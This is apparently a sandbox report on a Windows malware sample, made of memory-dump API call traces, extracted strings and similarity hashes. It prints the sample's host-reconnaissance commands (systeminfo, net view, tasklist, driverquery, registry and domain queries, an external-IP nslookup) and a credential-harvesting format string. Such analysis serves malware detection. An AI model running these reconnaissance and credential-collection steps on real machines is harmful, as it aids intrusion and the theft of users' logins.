• lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,0045378E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 00463BE0
• lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,0045378E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 00463BE7
• RtlAllocateHeap.NTDLL(00000000,?), ref: 00463BF9
• _snprintf.NTDLL ref: 00463C1C
  • Part of subcall function 0045E99C: memset.NTDLL ref: 0045E9B1
  • Part of subcall function 0045E99C: lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 0045E9EA
  • Part of subcall function 0045E99C: wcstombs.NTDLL ref: 0045E9F4
  • Part of subcall function 0045E99C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 0045EA25
  • Part of subcall function 0045E99C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,*<F), ref: 0045EA51
  • Part of subcall function 0045E99C: TerminateProcess.KERNEL32(?,000003E5), ref: 0045EA67
  • Part of subcall function 0045E99C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 0045EA7B
  • Part of subcall function 0045E99C: CloseHandle.KERNEL32(?), ref: 0045EAAE
  • Part of subcall function 0045E99C: CloseHandle.KERNEL32(?), ref: 0045EAB3
• _snprintf.NTDLL ref: 00463C45
  • Part of subcall function 0045E99C: GetLastError.KERNEL32 ref: 0045EA7F
  • Part of subcall function 0045E99C: GetExitCodeProcess.KERNEL32(?,00000001), ref: 0045EA9F
• HeapFree.KERNEL32(00000000,?,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 00463C66
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
• String ID: cmd /C "%s> %s1"$echo -------- >
• API String ID: 1481739438-1722754249
• Opcode ID: 6544aba379b81ae222e9d760c09f884bf354b36387b9aaefc2c9e1d319e457e4
• Instruction ID: a425378baec505b1fb83a050fa39991c5cce811f14dd4dbf1eb6b1c7784c8970
• Opcode Fuzzy Hash: 6544aba379b81ae222e9d760c09f884bf354b36387b9aaefc2c9e1d319e457e4
• Instruction Fuzzy Hash: 5D11BC72900118BBCF125F54DC41D9E7F39EF48360F15412AFD08A6261E7B69E60DBEA
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(00450C92,00000000,00000000,0046E280,?,?,004589B1,00450C92,00000000,00450C92,?), ref: 00453481
• RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0045348F
• wsprintfA.USER32 ref: 004534A4
• RegCreateKeyA.ADVAPI32(80000001,?,00000000), ref: 004534BC
• lstrlen.KERNEL32(?), ref: 004534CB
• RegCloseKey.ADVAPI32(?), ref: 004534E4
• HeapFree.KERNEL32(00000000,00000000), ref: 004534F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heaplstrlen$AllocateCloseCreateFreewsprintf
• String ID: @%s@
• API String ID: 3908752696-4128794767
• Opcode ID: aca2752fdab74b156899dc4626d0b21c8cda306e6304885d7ba4dc4813db181a
• Instruction ID: df56da19582399c6bdf8864ac9af09c001413de26f8678a3d9f7c13b9c79f62c
• Opcode Fuzzy Hash: aca2752fdab74b156899dc4626d0b21c8cda306e6304885d7ba4dc4813db181a
• Instruction Fuzzy Hash: F5019E36A00208BFEB021F95EC49FAA3B79FB49751F104035FA0591161FBF29D18DB6A
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,00000000,PG,0046675C), ref: 00459DD5
• lstrlenW.KERNEL32(?,00000000,PG,0046675C), ref: 00459DE6
• lstrlenW.KERNEL32(?,00000000,PG,0046675C), ref: 00459DF8
• lstrlenW.KERNEL32(?,00000000,PG,0046675C), ref: 00459E0A
• lstrlenW.KERNEL32(?,00000000,PG,0046675C), ref: 00459E1C
• lstrlenW.KERNEL32(?,00000000,PG,0046675C), ref: 00459E28
Strings
• type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s, xrefs: 00459EAB
• _iF, xrefs: 00459EB1
• PG, xrefs: 00459DBA
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: lstrlen
• String ID: PG$_iF$type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s
• API String ID: 1659193697-289553900

APIs
• lstrlen.KERNEL32(?,00000000,00000000,74B05520), ref: 0045F837
• lstrlen.KERNEL32(?), ref: 0045F83F
• lstrlen.KERNEL32(?), ref: 0045F8AA
• RtlAllocateHeap.NTDLL(00000000,?), ref: 0045F8D5
• memcpy.NTDLL(00000000,00000002,?), ref: 0045F8E6
• memcpy.NTDLL(00000000,?,?), ref: 0045F8FC
• memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0045F90E
• memcpy.NTDLL(00000000,004683E4,00000002,00000000,?,?,00000000,?,?), ref: 0045F921
• memcpy.NTDLL(00000000,?,00000002), ref: 0045F936
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: memcpy$lstrlen$AllocateHeap
• String ID:
• API String ID: 3386453358-0

APIs
• lstrlen.KERNEL32(?,00000000,00000000,74B05520), ref: 0045F837
• lstrlen.KERNEL32(?), ref: 0045F83F
• lstrlen.KERNEL32(?), ref: 0045F8AA
• RtlAllocateHeap.NTDLL(00000000,?), ref: 0045F8D5
• memcpy.NTDLL(00000000,00000002,?), ref: 0045F8E6
• memcpy.NTDLL(00000000,?,?), ref: 0045F8FC
• memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0045F90E
• memcpy.NTDLL(00000000,004683E4,00000002,00000000,?,?,00000000,?,?), ref: 0045F921
• memcpy.NTDLL(00000000,?,00000002), ref: 0045F936
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: memcpy$lstrlen$AllocateHeap
• String ID:
• API String ID: 3386453358-0

APIs
• CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 004417D0
• GetLastError.KERNEL32 ref: 004417DA
• WaitForSingleObject.KERNEL32(000000C8), ref: 004417FF
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00441820
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00441848
• WriteFile.KERNEL32(?,00001388,?,00000002,00000000), ref: 0044185D
• SetEndOfFile.KERNEL32(?), ref: 0044186A
• GetLastError.KERNEL32 ref: 00441876
• CloseHandle.KERNEL32(?), ref: 00441882
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
• String ID:
• API String ID: 2864405449-0

APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,004633AC,00000008,00461E90,00000010,00000001,00000000,0000012B,00461E90,00000000), ref: 0044E4B7
• WriteFile.KERNEL32(?,00000001,?,?,?), ref: 0044E4EB
• ReadFile.KERNEL32(?,00000001,?,?,?), ref: 0044E4F3
• GetLastError.KERNEL32 ref: 0044E4FD
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 0044E519
• GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 0044E532
• CancelIo.KERNEL32(?), ref: 0044E547
• CloseHandle.KERNEL32(?), ref: 0044E557
• GetLastError.KERNEL32 ref: 0044E55F
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
• String ID:
• API String ID: 4263211335-0

APIs
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
• GetLastError.KERNEL32(?,?,?,00001000,?,0046E130,74B5F750), ref: 0045EC8E
• WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,0046E130,74B5F750), ref: 0045ED13
• CloseHandle.KERNEL32(00000000,?,0046E130,74B5F750), ref: 0045ED2D
• OpenProcess.KERNEL32(00100000,00000000,00000000,?,?,?,0046E130,74B5F750), ref: 0045ED62
  • Part of subcall function 0044510C: RtlReAllocateHeap.NTDLL(00000000,0046E130,0046E130,0045ECD1), ref: 0044511C
• WaitForSingleObject.KERNEL32(?,00000064,?,0046E130,74B5F750), ref: 0045EDE4
• CloseHandle.KERNEL32(?,?,0046E130,74B5F750), ref: 0045EE0B
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
• String ID: IjD
• API String ID: 3115907006-1856596473

APIs
• GetCommandLineA.KERNEL32(?,00000000,00000000,00452C44,00000000,74B5F5B0,0044BAA6,61636F4C,00000001,?,?), ref: 0046593A
• StrChrA.SHLWAPI(00000000,00000020), ref: 0046594B
  • Part of subcall function 0044D57C: lstrlen.KERNEL32(?,?,ss: *.*.*.*,00000000,0045380B,00000000,?,?,?,?,000000FF,?,00000F00), ref: 0044D585
  • Part of subcall function 0044D57C: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,?,000000FF,?,00000F00), ref: 0044D5A8
  • Part of subcall function 0044D57C: memset.NTDLL ref: 0044D5B7
• ExitProcess.KERNEL32 ref: 00465A7F
  • Part of subcall function 004427F6: StrChrA.SHLWAPI(?,?), ref: 0044281C
  • Part of subcall function 004427F6: StrTrimA.SHLWAPI(?,0046A48C,00000001), ref: 0044283B
  • Part of subcall function 004427F6: StrChrA.SHLWAPI(?,?), ref: 0044284C
  • Part of subcall function 004427F6: StrTrimA.SHLWAPI(00000001,0046A48C), ref: 0044285E
• lstrcmp.KERNEL32(?,mail), ref: 004659A8
  • Part of subcall function 00454560: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00454583
  • Part of subcall function 00454560: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,00000008,?,?,?,0044606A), ref: 004545C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: HeapTrim$AllocateCommandExitFreeLineProcesslstrcmplstrlenmemcpymemset
• String ID: /C pause dll$7gF$mail
• API String ID: 4032499568-727635948

Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID:
• String ID: $hF
• API String ID: 0-4070453796

                                                                                                                                        • Opcode ID: cb28f922c98fc8ef4021ce7c26a211a798cca5d9f02ffd86891baff5df6414a6
                                                                                                                                        • Instruction ID: 280058b64dee84b338a45325999202ffa996d0c5cab8fe9d1f6b47ef1bb1bffe
                                                                                                                                        • Opcode Fuzzy Hash: cb28f922c98fc8ef4021ce7c26a211a798cca5d9f02ffd86891baff5df6414a6
                                                                                                                                        • Instruction Fuzzy Hash: 2941F471A007009FE7209F668C8591BB7E8BB44364B144A3FF567C26A0FBB49845CB5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00449C8C: lstrlen.KERNEL32(?,00000008,00000000,?,74B05520,00458DBF,?,?,00000000,004414AA,?,00000000,?,00464A70,?,00000001), ref: 00449C9B
                                                                                                                                          • Part of subcall function 00449C8C: mbstowcs.NTDLL ref: 00449CB7
                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0044606A), ref: 0045AB2B
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?,00000000,74B069A0,?,00000250,?,00000000), ref: 00456ED2
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0044606A), ref: 00456EDE
                                                                                                                                          • Part of subcall function 00456E86: memset.NTDLL ref: 00456F26
                                                                                                                                          • Part of subcall function 00456E86: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00456F41
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(0000002C), ref: 00456F79
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?), ref: 00456F81
                                                                                                                                          • Part of subcall function 00456E86: memset.NTDLL ref: 00456FA4
                                                                                                                                          • Part of subcall function 00456E86: wcscpy.NTDLL ref: 00456FB6
                                                                                                                                        • PathFindFileNameW.SHLWAPI(00000000,00000000,*.*,?,00000000,00000000,00000000), ref: 0045AB45
                                                                                                                                        • lstrlenW.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,?,0044606A), ref: 0045AB6F
                                                                                                                                          • Part of subcall function 00456E86: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00456FDC
                                                                                                                                          • Part of subcall function 00456E86: RtlEnterCriticalSection.NTDLL(?), ref: 00457011
                                                                                                                                          • Part of subcall function 00456E86: RtlLeaveCriticalSection.NTDLL(?), ref: 0045702D
                                                                                                                                          • Part of subcall function 00456E86: FindNextFileW.KERNEL32(?,00000000), ref: 00457046
                                                                                                                                          • Part of subcall function 00456E86: WaitForSingleObject.KERNEL32(00000000), ref: 00457058
                                                                                                                                          • Part of subcall function 00456E86: FindClose.KERNEL32(?), ref: 0045706D
                                                                                                                                          • Part of subcall function 00456E86: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00457081
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(0000002C), ref: 004570A3
                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0045AB8C
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00000000,*.*,?,00000000,00000000,00000000), ref: 0045ABAD
                                                                                                                                        • PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,?,0044606A), ref: 0045ABC2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 2670873185-438819550
                                                                                                                                        • Opcode ID: 0d42f73d1e868b8a872c3b7447e7c7daab4de4ac0eeae8c2145fa5f1136a4b46
                                                                                                                                        • Instruction ID: 65701a8dad9540491daf6c012d9e912d3a6af6f20de2aba65327eebb84367740
                                                                                                                                        • Opcode Fuzzy Hash: 0d42f73d1e868b8a872c3b7447e7c7daab4de4ac0eeae8c2145fa5f1136a4b46
                                                                                                                                        • Instruction Fuzzy Hash: A1317E71404245AFD710DF65C88482BBBEAFB84359F044A2EF98493222E735ED59CB97
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004536DA: lstrlen.KERNEL32(?,00000000,?,00000000,00464D5C,?,004683E7,00000000,?,?,0045476E,004683E7,?,?,004683E7), ref: 004536E6
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E268), ref: 0044C417
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E268), ref: 0044C42A
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0044C43B
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 0044C4A6
                                                                                                                                        • InterlockedIncrement.KERNEL32(00000000), ref: 0044C4BD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                                                                                                                                        • String ID: `F$`F
                                                                                                                                        • API String ID: 3915436794-2341081391
                                                                                                                                        • Opcode ID: 1489b8a017b8196f8db979a02574abb39768f6057b67b698bfd0f9e3031d4008
                                                                                                                                        • Instruction ID: b0ca5dcb034193fff5fe1386c80899a1755fb2f41295160d7d5509bd1d961fdd
                                                                                                                                        • Opcode Fuzzy Hash: 1489b8a017b8196f8db979a02574abb39768f6057b67b698bfd0f9e3031d4008
                                                                                                                                        • Instruction Fuzzy Hash: 8931D131606305DFE720CF59D99492BB7E9FB44321B054A2EF85583260EB78DC16CBDA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 00460EEE
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,Main,00000000,?,00000000,?,74B5F710,00000000), ref: 00460F13
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 00460F24
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,Main,00000000,?,00000000,?), ref: 00460F3F
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00460F5D
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00460F66
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapQueryValue$AllocateCloseFreeOpen
                                                                                                                                        • String ID: Main
                                                                                                                                        • API String ID: 170146033-521822810
                                                                                                                                        • Opcode ID: 99be40d95ac23bc7f91051817b4dae90380970d4d64bb8bd65f9766963c43917
                                                                                                                                        • Instruction ID: 5556bc2f88ba8c29d2a0c5b0d21f2af57ec39cbb0b5078a0fa37ce712e0df85d
                                                                                                                                        • Opcode Fuzzy Hash: 99be40d95ac23bc7f91051817b4dae90380970d4d64bb8bd65f9766963c43917
                                                                                                                                        • Instruction Fuzzy Hash: 5511F0B6E10109FFDB019F95DD84CEFBBBDEB48304B10447AE901A2120E7B19E54DB69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,00000000,?,000000FF,?,?,00460DE5,?,00000000), ref: 0046077C
                                                                                                                                        • lstrlen.KERNEL32( | "%s" | %u,?,?,00460DE5,?,00000000), ref: 00460787
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 00460798
                                                                                                                                          • Part of subcall function 00458379: GetLocalTime.KERNEL32(?,?,00460DE5,?,00000000), ref: 00458383
                                                                                                                                          • Part of subcall function 00458379: wsprintfA.USER32 ref: 004583B6
                                                                                                                                        • wsprintfA.USER32 ref: 004607BB
                                                                                                                                          • Part of subcall function 00443912: GetSystemTime.KERNEL32(?), ref: 00443930
                                                                                                                                          • Part of subcall function 00443912: wsprintfA.USER32 ref: 0044394E
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 004607EC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                                                                                                                                        • String ID: | "%s" | %u$F
                                                                                                                                        • API String ID: 3847261958-3490871454
                                                                                                                                        • Opcode ID: c4adde96d270fe0ec5bef46c866e16653ba8fb3cd8c2e42df055d2e48eac334b
                                                                                                                                        • Instruction ID: dfb0010d80d3e38785a6fab8f68d15d87c0ca04f35f9d25c1ee937fcb523fec4
                                                                                                                                        • Opcode Fuzzy Hash: c4adde96d270fe0ec5bef46c866e16653ba8fb3cd8c2e42df055d2e48eac334b
                                                                                                                                        • Instruction Fuzzy Hash: C2119E71A00108FFDB10AB66DC88D6B7B6DEB44355B100536F808E3221EAB59E05DBA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • lstrcmpi.KERNEL32(00000000,Main), ref: 0044B6D4
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E268), ref: 0044B6E6
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E268), ref: 0044B6F9
                                                                                                                                        • lstrcmpi.KERNEL32(0046E280,00000000), ref: 0044B71A
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0044F889,00000000), ref: 0044B72E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                                                                                                                                        • String ID: Main$`F
                                                                                                                                        • API String ID: 1266740956-1547571671
                                                                                                                                        • Opcode ID: a88e4b4d86c74a04c5a7f504c98989930a2d0d5c763d1a9832ad14c319ce46ee
                                                                                                                                        • Instruction ID: a2acba60d3e302362340c1467be2ff6a3ff1e70aa9d419cee5b6db8f562696dd
                                                                                                                                        • Opcode Fuzzy Hash: a88e4b4d86c74a04c5a7f504c98989930a2d0d5c763d1a9832ad14c319ce46ee
                                                                                                                                        • Instruction Fuzzy Hash: D311E231600204EFEB048F29CC59E9AB7ECFF45321B04826AE405A3350EBB8DD41CB99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(?,004539B4,00000000,?,?,?,004539B4,?,?,?,?,?), ref: 0044A8BD
                                                                                                                                        • lstrlen.KERNEL32(004539B4,?,?,?,004539B4,?,?,?,?,?), ref: 0044A8CF
                                                                                                                                        • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 0044A943
                                                                                                                                        • lstrlen.KERNEL32(004539B4,00000000,00000000,?,?,?,004539B4,?,?,?,?,?), ref: 0044A958
                                                                                                                                        • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 0044A971
                                                                                                                                        • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 0044A97A
                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0044A988
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlenmemcpy$FreeLocal
                                                                                                                                        • String ID: $hF
                                                                                                                                        • API String ID: 1123625124-4070453796
                                                                                                                                        • Opcode ID: f43c0589a13537bc96d416c5f1eb5041da53ce90dc9b70d6dcd2d9c5db1cde9e
                                                                                                                                        • Instruction ID: bda6096b8e508d08249c812da096e97a449e7f9c14352c9f50993e37b89c6090
                                                                                                                                        • Opcode Fuzzy Hash: f43c0589a13537bc96d416c5f1eb5041da53ce90dc9b70d6dcd2d9c5db1cde9e
                                                                                                                                        • Instruction Fuzzy Hash: 93310BB280021AABDF10DF66DC458DF3FA8EF143A4F15446AFC0896211E735DE648BE6
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
  • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
  • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
  • Part of subcall function 004606D4: GetCurrentThreadId.KERNEL32 ref: 0046070C
  • Part of subcall function 004606D4: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
  • Part of subcall function 004606D4: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
  • Part of subcall function 004606D4: lstrcpy.KERNEL32(00000000), ref: 00460748
• HeapFree.KERNEL32(00000000,00000000,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000,?,net view >,00000000), ref: 00446D64
Strings
• driverquery.exe >, xrefs: 00446D12
• nslookup 127.0.0.1 >, xrefs: 00446CE6
• wmic computersystem get domain |more , xrefs: 00446C97
• systeminfo.exe >, xrefs: 00446CB6
• reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >, xrefs: 00446D28
• tasklist.exe /SVC >, xrefs: 00446CFC
• net view >, xrefs: 00446CD0
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Temp$FilePathTime$CurrentFreeHeapNameSystemThreadlstrcpy
• String ID: driverquery.exe >$net view >$nslookup 127.0.0.1 >$reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >$systeminfo.exe >$tasklist.exe /SVC >$wmic computersystem get domain |more
• API String ID: 3485239229-3033342
• Opcode ID: 35dc8046c797b9afb5e08fba4f22c879deb7c2c07236a69fa68176d7f7a0fb3f
• Instruction ID: ab74d506b086d771e2e8a5b01ce40e1a36d6e2701cdd406fcdf491a0b083260e
• Opcode Fuzzy Hash: 35dc8046c797b9afb5e08fba4f22c879deb7c2c07236a69fa68176d7f7a0fb3f
• Instruction Fuzzy Hash: CE21F8F3E016B2239731365A5C86E6B59998683F5471B036BFED077351A98D9C0042EF
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,00455F7A,?,?,?,?), ref: 0045A99B
• RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0045A9AD
• wcstombs.NTDLL ref: 0045A9BB
• lstrlen.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,00455F7A,?,?,?,?,?), ref: 0045A9DF
• RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0045A9F4
• mbstowcs.NTDLL ref: 0045AA01
• HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,00455F7A,?,?,?,?,?), ref: 0045AA13
• HeapFree.KERNEL32(00000000,00000000,00000001,00000001,?,00455F7A,?,?,?,?,?), ref: 0045AA2D
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
• String ID:
• API String ID: 316328430-0
• Opcode ID: 14d67dfd29e13a233ece89c4e424075f614317e4bb69a7c190366217633e8876
• Instruction ID: 485054b509435fb889cc3c89797e59bea10fc92d6d97e310c0acf8f2dbf7201a
• Opcode Fuzzy Hash: 14d67dfd29e13a233ece89c4e424075f614317e4bb69a7c190366217633e8876
• Instruction Fuzzy Hash: C8217F71900249FFCF108FA4EC08F9B7B79EB44305F104635FA05A11A1EBB59D69DB6A
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenProcess.KERNEL32(00000040,00000000,?), ref: 00454394
• RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 004543B2
• RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 004543BA
• DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 004543D8
• GetLastError.KERNEL32 ref: 004543EC
• RegCloseKey.ADVAPI32(?), ref: 004543F7
• CloseHandle.KERNEL32(00000000), ref: 004543FE
• GetLastError.KERNEL32 ref: 00454406
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
• String ID:
• API String ID: 3822162776-0
• Opcode ID: be068137a2038d6c686870a199138700c6927584bed11a66bdec4a9921d64725
• Instruction ID: 0b1410a3f36d6d95703815e53615103da97c6b44217b06b85ffac61e52116dec
• Opcode Fuzzy Hash: be068137a2038d6c686870a199138700c6927584bed11a66bdec4a9921d64725
• Instruction Fuzzy Hash: 08116135200209FFDB015F90DC48F6A3B69EB84356F114426FE06CA261EBB4CD58DB3A
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(?), ref: 00465804
• lstrlen.KERNEL32(142A03F6), ref: 00465812
